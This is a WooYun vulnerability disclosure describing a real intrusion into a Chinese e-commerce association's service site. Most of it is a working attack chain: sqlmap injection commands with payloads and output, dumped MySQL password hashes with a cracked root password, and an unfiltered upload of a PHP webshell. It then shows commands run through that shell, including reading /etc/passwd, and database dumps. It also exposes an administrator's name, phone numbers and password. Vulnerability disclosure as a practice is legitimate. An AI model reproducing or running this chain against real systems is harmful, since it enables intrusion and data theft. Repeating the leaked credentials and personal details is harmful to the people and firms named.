当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161186

漏洞标题:中国电子商务协会数字服务中心SQL注入导致Getshell&数万家企业详细信息泄漏(银行卡号\电话\地址\交易金额等)

相关厂商:中国电子商务协会

漏洞作者: 路人甲

提交时间:2015-12-14 15:42

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

中国电子商务协会数字服务中心sql注入导致getshell&数万家企业详细信息泄漏(银行卡号,电话,地址,交易金额等)

详细说明:

说明:注入点存在于网站二级域名:https://**.**.**.**/ ip:**.**.**.**
注入点:

https://**.**.**.**//entry.php?action=getUserinfo2&userId=1


通过sql注入测试:

sqlmap.py -u "https://**.**.**.**//entry.php?action=getUserinfo2&userId=1" --dbs -p "userId"
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] yyyyy
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
GET parameter 'userId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 90 HTTP(s) requests:
---
Parameter: userId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=getUserinfo2&userId=1 AND 9804=9804
Type: UNION query
Title: MySQL UNION query (97) - 11 columns
Payload: action=getUserinfo2&userId=1 UNION ALL SELECT 97,97,CONCAT(0x71716b7071,0x41426a505545424d6c70,0x7178787171),97,97,97,97,97,97,97,97#
---
[22:35:37] [INFO] testing MySQL
[22:35:41] [INFO] confirming MySQL
[22:35:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.5
back-end DBMS: MySQL >= 5.0.0
[22:35:52] [INFO] fetching database names
[22:35:54] [INFO] the SQL query used returns 19 entries
[22:35:55] [INFO] retrieved: information_schema
[22:36:01] [INFO] retrieved: accesslog
[22:36:02] [INFO] retrieved: company
[22:36:13] [INFO] retrieved: cxt
[22:36:14] [INFO] retrieved: cxt_cert
[22:36:24] [INFO] retrieved: dede53
[22:36:28] [INFO] retrieved: joyinweb
[22:36:33] [INFO] retrieved: mysql
[22:36:35] [INFO] retrieved: performance_schema
[22:36:40] [INFO] retrieved: phpcms
[22:36:49] [INFO] retrieved: phpmyvisites
[22:36:52] [INFO] retrieved: piwik
[22:37:33] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:37:37] [INFO] retrieved: rdfocus
[22:37:38] [INFO] retrieved: szfw2
[22:37:40] [INFO] retrieved: szfw2_call
[22:37:44] [INFO] retrieved: test
[22:37:50] [INFO] retrieved: textpattern
[22:37:54] [INFO] retrieved: tikiwiki
[22:37:58] [INFO] retrieved: typecho
available databases [19]:
[*] accesslog
[*] company
[*] cxt
[*] cxt_cert
[*] dede53
[*] information_schema
[*] joyinweb
[*] mysql
[*] performance_schema
[*] phpcms
[*] phpmyvisites
[*] piwik
[*] rdfocus
[*] szfw2
[*] szfw2_call
[*] test
[*] textpattern
[*] tikiwiki
[*] typecho
[22:37:58] [INFO] fetched data logged to text files under 'C:\Users\echo\.sqlmap\output\**.**.**.**'
[*] shutting down at 22:37:58


发现大量数据库,我们先来获取下mysql用户和密码:

database management system users password hashes:
[*] cxt [1]:
password hash: *E4160ED508CFFDE837FD1E722E03D0674F29E348
[*] dede53joyinweb [1]:
password hash: 3ac62ba04d47bcc6
[*] fed [1]:
password hash: *8C6AF7ACCB56BE82F7EE97C266E7A60EAE38C208
[*] handong [1]:
password hash: 53c88c6546334797
[*] joyinweb [1]:
password hash: NULL
[*] lihm [1]:
password hash: *A83EC55BA3908358629C1E0E96F167AA096F7703
[*] repl_user [1]:
password hash: *23AE809DDACAF96AF0FD78ED04B6A265E05AA257
[*] root [1]:
password hash: *6172ACA86C070EDD58B17AFAFF14DDF1BAC7CF88 8812345
[*] ryf [1]:
password hash: *78C93EE971A8D9072AF9C48BE9508B4FD17B63EE
[*] szfw [1]:
password hash: *40804F154E28837515CCD9A3D6C6FFCC36E992D4
[*] user_company [1]:
password hash: 63d2d4fa187fc0cd
[*] usr_joyinweb [1]:
password hash: *66E20D0D08FFBC31659D79E07D4FA1DA7F1E7D0C
[*] usr_piwik [1]:
password hash: 52e9e5db1b484df9
[*] usr_rdfocus [1]:
password hash: 52c52d76135f9bce
[*] zabbix [1]:
password hash: NULL

current user: 'cxt@%'


成功解密root密码:8812345,本地连接,

1.jpg


改用Navicat for MySQL连接,查看后台密码,居然是明文的,呜呜

2.jpg


后台地址:http://**.**.**.**/entry.php?action=checkLogin登陆:
查看过万商家信息:

3.jpg


5.jpg


找到上传点:没任何过滤,直接上传php一句话:

6.jpg


8.jpg

7.jpg

虚拟终端执行命令:

9.jpg


[/data/htdocs/szfw/cxt/upload/]$ cat /etc/passwd |cut -f 1 -d :
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
gopher
ftp
nobody
vcsa
dbus
sshd
haldaemon
nscd
ldap
apache
www
nginx
mysql
adpanshi
zabbix
ntp
mailnull
smmsp
[/data/htdocs/szfw/cxt/upload/]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
apache:x:48:48:Apache:/var/www:/sbin/nologin
www:x:500:500::/home/www:/sbin/nologin
nginx:x:100:102:Nginx user:/var/lib/nginx:/bin/false
mysql:x:501:501::/home/mysql:/bin/false
adpanshi:x:502:502::/home/adpanshi:/bin/bash
zabbix:x:503:503::/home/zabbix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin


这里未进行提权操作,因为liunx还不是太熟悉,但不敢拿大政府的网站练手。
================================================================================
到这里本应该结束了,本来没考虑主站的情况,但后来在主站无意发现在主站url加’均报错,得到大量信息:
比如:http://**.**.**.**/index.php' 暴露绝对路径:

**.**.**.** index.php'.png


泄露信息快赶上phpinfo了,
由此得知:主站是站库分离状态,数据库正存在于上面拿下shell的网站:
既然有了数据库的root用户,那我们能做很多事,比如脱裤,数据还是挺大的

mysql> use szfw2;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_szfw2 |
+---------------------------------------+
| agent_map |
| am_agent |
| am_agent_contact |
| am_agent_in_out_sea_his |
| am_agent_log |
| am_agent_move |
| am_agent_pact |
| am_agent_permit |
| am_agent_share |
| am_agent_share_checklog |
| am_agent_source |
| am_agentcheck_log |
| am_agentpact_checklog |
| am_expect_charge |
| am_expect_charge_history |
| am_last_contact |
| am_pact_cashdeposit |
| am_pact_translog |
| am_quarterly_task |
| am_visit_acc_check |
| am_visit_acc_return |
| am_visit_accompany |
| am_visit_appoint |
| am_visit_note |
| am_visit_return |
| am_visit_vertify |
| am_visit_vertify_item |
| cert_company |
| cert_domain |
| cert_license |
| cm_ag_contact |
| cm_ag_contact_recode |
| cm_customer |
| cm_customer_agent |
| cm_customer_ex |
| cm_customer_log |
| cm_customer_move |
| cm_customer_permit |
| cm_data_config |
| cm_intention |
| cm_user_move |
| com_audit_record |
| com_bill_no |
| drp_wm_customer |
| fm_account_detail_rp |
| fm_account_recharge |
| fm_agent_account |
| fm_agent_account_amount |
| fm_agent_account_detail |
| fm_agent_bank |
| fm_attachments |
| fm_bank_account |
| fm_invoice_bill |
| fm_invoice_isseu |
| fm_invoice_isseu_bill |
| fm_invoice_no |
| fm_invoice_type |
| fm_post_money |
| fm_receipt_payment_mode |
| fm_receivable_pay |
| fm_receivable_pay_state |
| fm_unit_out_money |
| hr_abpost |
| hr_department |
| hr_dept_position |
| hr_e_position |
| hr_employee |
| hr_employee_old |
| hr_level |
| hr_position |
| hr_postion_level |
| log_login |
| log_operate |
| log_webservice |
| om_order |
| om_order_gift |
| om_order_gift_set |
| om_order_move_log |
| om_order_no |
| om_order_recharge |
| om_order_website |
| rpt_agent_contact_record |
| rpt_agent_intention_rating |
| rpt_kpi_base |
| sys_account_group |
| sys_account_group_user |
| sys_agent_model |
| sys_agent_model_detail |
| sys_agroup_manager |
| sys_agroup_manager_detail |
| sys_area |
| sys_area_group |
| sys_area_group_detail |
| sys_base_data |
| sys_city |
| sys_com_setting |
| sys_const_data |
| sys_data_synchronous |
| sys_dev_auto_code |
| sys_industry |
| sys_intention_rating |
| sys_message |
| sys_model |
| sys_model_group |
| sys_model_right |
| sys_post_right |
| sys_product |
| sys_product_price_model |
| sys_product_type |
| sys_province |
| sys_role |
| sys_role_right |
| sys_send_mail |
| sys_soap_log |
| sys_unit |
| sys_unit_salereward_rate_model |
| sys_unit_salereward_rate_model_detail |
| sys_upload_doc |
| sys_user |
| sys_user_area |
| sys_user_old |
| sys_user_right |
| sys_user_role |
| sys_vacation_days |
| sys_zone |
| temp_111 |
| temp_cert_company |
| temp_cm_customer_del |
| tm_eMail |
| tm_net |
| tm_net_account |
| tm_net_model_manage_user |
| tm_net_model_manage_user_history |
| tm_net_verify |
| tm_single_info |
| tm_trustworthy |
| v_am_agent_pact_product |
| v_am_effect_pact_product |
| v_channel_manager_area |
| v_hr_abpost |
| v_hr_employee |
| view_hr_employee_szfw |
+---------------------------------------+
142 rows in set (0.57 sec)
mysql> select * from sys_user where user_name=admin;
ERROR 1054 (42S22): Unknown column 'admin' in 'where clause'
mysql> select * from sys_user where user_name="admin";
+---------+----------+-------+--------+---------+-----------+----------------------------------+-----------+--------------+-------------+-------------+------------+---------+--------+------------+---------------------+------------+---------------------+---------------------+-------------+------------+-------------+------------+
| user_id | agent_id | e_uid | e_name | user_no | user_name | user_pwd | dept_name | tel | phone | user_remark | sort_index | is_lock | is_del | create_uid | create_time | update_uid | update_time | last_login_time | login_count | is_finance | finance_uid | finance_no |
+---------+----------+-------+--------+---------+-----------+----------------------------------+-----------+--------------+-------------+-------------+------------+---------+--------+------------+---------------------+------------+---------------------+---------------------+-------------+------------+-------------+------------+
| 23055 | 2 | 0 | 陈莹 | 10 | admin | 3d9188577cc9bfe9291ac66b5cc872b7 | | 010-82827336 | 18811410075 | | 0 |
0 | 0 | 22303 | 2015-07-08 01:25:57 | 23055 | 2015-12-10 09:15:41 | 2015-12-10 09:15:41 | 259 | 1 | 23055 | 10 |
+---------+----------+-------+--------+---------+-----------+----------------------------------+-----------+--------------+-------------+-------------+------------+---------+--------+------------+---------------------+------------+---------------------+---------------------+-------------+------------+-------------+------------+
1 row in set (0.19 sec)


11.jpg


12.jpg


注册用户过万,商户信息过万
获取后台用户名:admin,密码两次md5加密,但成功解密,居然是123456,但遗憾的是没能找到后台地址:

13.jpg


由此,转而查看数据库中的内容:
商户条数过万,好几个数据库中都有商户信息。其中包括银行卡号,交易金额,电话号码等等。

14.jpg

15.jpg


没有一一列举其中的数据。就是这样。

漏洞证明:

见上述分析

修复方案:

过滤,关闭错误提醒,删除敏感信息

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-18 15:31

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无